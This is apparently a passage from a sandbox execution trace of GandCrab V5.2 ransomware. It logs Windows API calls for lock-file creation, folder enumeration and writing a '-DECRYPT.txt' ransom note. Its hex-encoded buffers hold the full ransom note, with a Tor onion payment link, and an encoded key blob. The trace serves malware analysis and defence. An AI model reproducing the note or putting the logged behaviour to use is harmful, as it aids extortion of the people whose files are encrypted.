x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.506] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0069.507] CloseHandle (hObject=0x2bc) returned 1 [0069.507] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.507] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.508] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x338)) [0069.508] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.508] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.508] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.508] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\d2ca4a09d2ca4deb61a.lock") returned 81 [0069.508] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0069.509] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.509] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.509] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\") returned 57 [0069.509] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0069.509] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5033b8 [0069.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.509] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.509] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.509] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.509] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.509] lstrcmpW (lpString1="AssetCache", lpString2=".") returned 1 [0069.509] lstrcmpW (lpString1="AssetCache", lpString2="..") returned 1 [0069.510] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="AssetCache" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0069.510] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\" [0069.510] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.510] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.510] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.510] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.510] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.510] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.510] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.511] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.511] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.511] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.511] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.511] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\\\TITWMVJL-DECRYPT.txt") returned 89 [0069.511] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\assetcache\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0069.512] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x